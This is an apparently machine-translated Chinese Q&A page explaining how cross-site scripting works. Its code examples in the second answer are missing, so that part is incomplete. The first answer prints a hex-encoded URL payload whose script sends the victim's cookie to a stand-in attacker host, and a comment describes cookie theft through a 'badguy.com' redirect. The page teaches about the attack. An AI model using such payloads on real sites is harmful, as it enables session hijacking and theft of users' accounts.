XSS如何运作？

编码恶意代码也很常见,例如以十六进制编码:

http://VulnerableHost/a.php?variable=%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%41%74%74%61%63%6B%65%72%73%48%6F%73%74%2F%63%67%69%2D%62%69%6E%2F%63%6F%6F%6B%69%65%2E%63%67%69%3F%20%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E

---

这是过滤的好事!:P

---

@CraigJacobs,攻击者将创建超链接,并将其发送给"受害者".受害者点击它,代码在他们的浏览器上执行.现在,诀窍是javascript的作用.它可以从页面中删除数据,或者获取用户的cookie,然后将其发送到其他地方.例如,它可能需要用户的cookie,并将用户重定向到www.badguy.com?cookies=cookiesHere2343rwerw.现在,badguy.com可以进入受害者的会话并做坏事.

2> Mike Samuel..：

---

只要应用程序外部的字符串可以解释为代码,就会存在XSS漏洞.

例如,如果您通过执行以下操作生成HTML:

然后,如果$myQueryParameter变量包含

无名有名我无名_593

这个屌丝很懒，什么也没留下！

关注作者

Tags | 热门标签

• actionscrip
• bash
• c#
• c++
• c语言
• erlang
• flutter
• go
• golang
• java
• javascript
• lua
• node.js
• perl
• php
• python
• scala
• typescript

RankList | 热门文章

• 1什么是？MODULE
• 2常规过程/方法指针
• 3如何在LINQ查询的where子句中将方法/函数作为IEnumerable对象调用
• 4如何将此SQL语句转换为PostgreSQL？
• 5在张量流中将3通道掩模应用于3通道Tensor
• 6安装自定义构建heroku并使用库路径发出问题
• 7重载Extraction和Insertion << >> operator c ++
• 8如何为TensorFlow变量赋值？
• 9Flexbox调整复选框的大小(太小)
• 10有没有办法在Visual Studio Code中生成JSDoc注释
• 11Visual Studio 2015 - 在重新启动Visual Studio之前,ASP.Net应用程序不会启动
• 12模拟对象不起作用
• 13如何使用游标在不同的数据库中创建过程
• 14Elasticsearch搜索的结果多种多样
• 15Java字符串不可变
• 16使用Python和Regex提取不同格式的日期
• 17用于在Python中更新共享字典的多处理模块
• 18grid.Call出错(L_textBounds,as.graphicsAnnot(x $ label),x $ x,x $ y,:找不到多边形边缘(新)
• 19更新到Angular 2后,无法在Firefox上通过Protractor运行Selenium
• 20当前网址app /与其中任何一个都不匹配